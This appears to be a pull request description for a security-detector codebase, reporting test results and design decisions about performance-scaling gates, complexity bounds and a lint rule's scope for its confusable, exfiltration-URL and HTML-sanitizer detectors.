- Every non-vacuity claim in the gate is a marker assertion read **at the size the timing is taken at**, and three cases were caught timing something other than what they name this way (see *Decisions made*).
- `node --test` on every touched suite — 966 html, 116 confusables, 10 gate — plus the pre-commit guard set (43 suites): green. `pnpm lint` and `pnpm check` clean. `src/confusables.mjs` holds 100% coverage from its own targeted suites.
- Not run locally, per `CLAUDE.md`: the full suite, and `test/hook-latency.test.mjs` — this container fails 2 of its tight budget cells on the **pristine** tree, so those readings are container noise. CI reads that gate uninstrumented.

## Decisions made

- **The guarantee is stated as `n log n`, not linear.** `foldConfusables` sorts findings and `mergeRanges` sorts ranges, both over input whose order no caller promises, so "linear" overstated both the code and what the gates check. The section now names both sorts and says the bound the gates are calibrated to is that nothing is *quadratic*. The sorts stay: requiring ordered findings would move the ordering obligation onto every scanner that feeds the fold, which validates rather than trusts what it is handed.
- **The `checkExfilUrl` query-value case was dropped as unreachable.** A query that long is answered &#34;unusually long query string&#34; before any per-value analysis, so the mix test cannot be reached there at any size that shows a curve; only the path route is measurable, and only with `-`/`_` in the segment, since the cheaper whole-segment patterns decline first.
- **The `sanitizeHtml` case does not demonstrate its own defect, and the file says so.** Its first spelling measured nothing at all: openers of `<ab ` end in `<ab >`, which parses as an inline html node of its own, so the raw slice handed to the absorb fold stopped before the `>` and the tail test answered in constant time. With `<a! ` openers — not a well-formed tag, so the whole run stays in one inter-node slice — the old pattern reads 10.2x against the new spelling&#39;s 10.0x: the document parse costs as much again as the rescan at *both* sizes and pulls the blended ratio toward linear. It stays as a growth gate on the Layer-2 entry point.
- **`GROWTH_LIMIT` is 20, not 24, and is not shared with `hook-latency`&#39;s `SCALING_LIMIT`.** Calibrating on the loud defects (61–64x) would have left the limit above the quiet one: the per-finding rebuild read 27.1x, a 1.13x margin at 24. The two gates measure different populations — hook paths whose small side a per-call constant inflates, against large-input adversarial shapes — so one shared constant would have to take the looser value, which is the one that nearly missed a real quadratic. What the two gates share is the estimator, and that is what moved into `test/helpers/cpu-timing.mjs`.
- **The numeric differential pairs pin their accepting side with a named token** rather than counting accepts across the draw. The counter was a lucky draw — a run that never generated a token like `50%` failed the non-vacuity guard rather than the patterns, which is a flake, and an example is the stronger check anyway.
- **The lint rule covers `src/`, `claude-hooks/`, `bin/`, `plugin/scripts/`, not the whole tree.** Tree-wide it reports 58 findings, 56 of them assertion regexes and committed-YAML parsers reading text this repo wrote. That is the alert fatigue `CLAUDE.md` names as a real harm and is how the two genuine findings stop being read. The alternative, `permittableComplexities: [&#34;polynomial&#34;]`, suppresses exactly the degree class both real findings fall into.
- **`PATH_BLOB_RE` and the double `rawParams` walk are left alone**, with their linear bounds now stated in place: `={0,2}$` fails in constant time after the first giveback, and two O(params) walks are a constant factor. `src/instructions.mjs` was on the suspect list and is already linear. `depthMemo`&#39;s seen-set residual is assessed and documented, not keyed — the bound is O(nodes × MAX_DEPTH) either way.

Author checklist

- [x] Conventional Commits; each subject reads as a user-facing release note.
- [x] `pnpm lint` and `pnpm check` pass; targeted suites pass (full `pnpm test` is CI&#39;s).
- [x] New detectors have negative tests and pin invariants with property/fuzz tests.
- [x] No secrets in the diff, tests, or description.
- [x] `CHANGELOG.md` and `package.json` version untouched.
